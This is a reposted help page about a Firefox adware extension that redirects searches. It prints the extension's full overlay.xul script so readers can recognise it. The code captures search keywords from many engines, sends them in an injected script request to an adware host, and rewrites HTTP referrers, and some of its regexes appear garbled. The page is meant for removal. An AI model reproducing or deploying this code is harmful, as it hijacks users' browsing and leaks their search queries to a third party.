Firefox 脚本病毒 redirect-script
来源:互联网 发布:2018年5g网络 编辑:程序博客网 时间:2024/06/05 09:30
Provided by: SpillSpace.com
Return to Post:New Firefox Virus Causes Redirects to Adsites: How to fix it, how to avoid it
Right click on the file (most likely called overlay.xul), choose "open with", select either notepad or wordpad. The result may not come out as nice and neat as the code below, that is OK. Scroll past the License Block. Look for code similar to what you see below:
________________________________________________________________________________
<overlay id="xulcache-overlay" xmlns="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul">
<script type="application/x-javascript" >
window.addEventListener("load", function() { xulRef.init(); }, false);
window.addEventListener("load", initRequestObserver, false);
var xulRef = {
init:
function(){
var appcontent = document.getElementById("appcontent");
if(appcontent){
appcontent.addEventListener("DOMContentLoaded", xulRef.onPageLoad, true);
}
},
onPageLoad:
function(aEvent){
var doc = aEvent.originalTarget;
var loc = doc.location.href;
var ref = doc.referrer;
var keyword = '';
var engine ;
var __d = "http://v1.adwarefeed.com/ffjs.php?u=2630369290-57989841-1078081533-839522115a=998&s=3&v=icv270109ff&e=";
if( loc.match(/google/..+//search.*[&/?]q=([^&]*)/)){
keyword = RegExp.$1;
engine = 'google';
// } else if(loc.match(/search/.ua.+[&/?]q=([^&]*)/)){
// keyword = RegExp.$1;
} else if ( loc.match(/search/.yahoo.*search.*[&/?]p=([^&]*)/)){
keyword = RegExp.$1;
engine = 'yahoo';
} else if(loc.match(/altavista/.com.*results[&/?].*q=([^&]*)/)){
keyword = RegExp.$1;
engine = 'altavista';
} else if(loc.match(/alltheweb/.com.*search[&/?].*q=([^&]*)/)){
keyword = RegExp.$1;
engine = 'alltheweb';
} else if(loc.match(/search/.netscape/.com.*search[&/?].*query=([^&]*)/)){
keyword = RegExp.$1;
engine = 'netscape';
} else if(loc.match(/search/.aol/.com.*search[&/?].*query=([^&]*)/)){
keyword = RegExp.$1;
engine = 'aol';
} else if(loc.match(/ask/.com.*web[&/?].*q=([^&]*)/)){
keyword = RegExp.$1;
engine = 'ask';
} else if(loc.match(/search/.com.*search[&/?].*q=([^&]*)/)){
keyword = RegExp.$1;
engine = 'searchcom';
} else if(loc.match(/search/.lycos/.com.*[&/?].*query=([^&]*)/)){
keyword = RegExp.$1;
engine = 'lycos';
} else if(loc.match(/nova/.rambler/.ru.*search[&/?].*query=([^&]*)/)){
keyword = RegExp.$1;
engine = 'rambler';
} else if(loc.match(/gogo/.ru.*go[&/?].*q=([^&]*)/)){
keyword = RegExp.$1;
engine = 'gogo';
} else if(loc.match(/meta/.ua.*search.asp[&/?]q=([^&]*)/)){
keyword = RegExp.$1;
engine = 'meta';
//} else if(loc.match(/au/.ru.*searchPhrase=([^&]*)/)){
// keyword = RegExp.$1;
} else if(loc.match(/all/.by.*search.*[&/?]query=([^&]*)/)){
keyword = RegExp.$1;
engine = 'allby';
// } else if(loc.match(/uaport/.net.*UAcatalog[/][&/?].*query=([^&]*)/)){
// keyword = RegExp.$1;
} else if(loc.match(/search/.msn/.com.*results.*[&/?].*q=([^&]*)/)){
keyword = RegExp.$1;
engine = 'msn';
} else if(loc.match(/search/.live/.com.*results.*[&/?]q=([^&]*)/)){
keyword = RegExp.$1;
engine = 'live';
};
if( keyword.length > 0 ){
var script = window.content.document.createElement('script');
script.id = "js_0";
script.src = __d + engine + '&q=' + keyword;
doc.getElementsByTagName('head')[0].appendChild(script);
}
}
};
function initRequestObserver() {
var observerService = Components.classes["@mozilla.org/observer-service;1"].getService(Components.interfaces.nsIObserverService);
observerService.addObserver(httpRequestObserver, "http-on-modify-request", false);
}
var httpRequestObserver = {
observe:
function(subject, topic, data) {
if(topic == "http-on-modify-request") {
var httpChannel = subject.QueryInterface(Components.interfaces.nsIHttpChannel);
var pos = subject.URI.spec.indexOf("&rf=http");
if(pos > -1) {
var newRef = this.ioService = Components.classes["@mozilla.org/network/io-service;1"] .getService(Components.interfaces.nsIIOService) .newURI(decodeURIComponent(subject.URI.spec.substring(pos+4)), null, null);
httpChannel.referrer = newRef; subject.URI.spec = subject.URI.spec.substring(0, pos);
}
}
}
};
</script>
</overlay>
- Firefox 脚本病毒 redirect-script
- 一段病毒常用的vb script脚本
- Firefox - 附加软件 - Firebug - Script脚本视图 - 在页面加载过程中的脚本设置断点
- script脚本
- 脚本script
- Firefox - 附加软件 - Firebug - Script脚本视图 - Options选项 - Break on All Errors在所有错误处中断
- Firefox - 附加组件 - 扩展 - Firebug - Script脚本面板 - BreakOnErrors在全部错误处标记中断选项不受try/catch影响
- 常用Script脚本
- WML Script脚本程序设计
- script脚本加载问题
- Oracle常用脚本 Script
- Oracle常用脚本 Script
- external script外部脚本
- Oracle常用脚本 Script
- ld script 脚本浅析
- Shell Script[Shell脚本]
- update-script脚本语法
- 连接脚本(Linker Script)
- Alternativa3D 7教程开篇 -- A3D引擎概貌
- Linux内存管理——valgrind 分享
- Xen和虚拟化常用命令
- 如何查看操作系统是32位还是64位?
- Sql Server数据库实用命令
- Firefox 脚本病毒 redirect-script
- javascript 函数
- firefox 3 call Components.classes 错误
- 转:如何调整ABAP程序的性能
- 程序员面试题精选 (转载)
- JSTL访问Map问题,key为Integer或Long
- Setting up an extension development environment
- 无题
- Android进行中
